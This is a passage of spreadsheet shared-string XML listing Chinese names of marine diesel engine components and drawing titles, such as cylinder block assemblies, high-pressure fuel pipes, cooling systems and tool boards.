        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套注油头生产推荐</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套钻孔攻丝工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体部分后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体部件管路</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体部件上管路</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体单元总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体的组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体底部视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体剖视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体其余部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体泄放主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体中间块</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低淡水泵套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高弹性部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高磨擦镀层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高速搅拌机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温中央冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温和低温水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温开关用冷却水温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温冷却水备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温冷却水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温密封油图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温水出口集管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温水预热箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管接套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管密封工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管磨铣工具导板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管磨铣工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管压力测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压过滤器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压过滤器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压密封油单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压喷管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管船级规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管研磨轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压油管制造</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高液位报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔板导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔板密封说明手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔离舱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔离放大器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔离环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热和消音质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔套管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔音设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各类工具图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种把手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种变更管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种温度计的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铬钢套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铬合金层延展</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>给料器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>给油单元管系总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>给油单元总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>跟踪滚珠轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>跟踪球</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工厂交付试车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工程布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具柜总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形及叉形扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座对中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
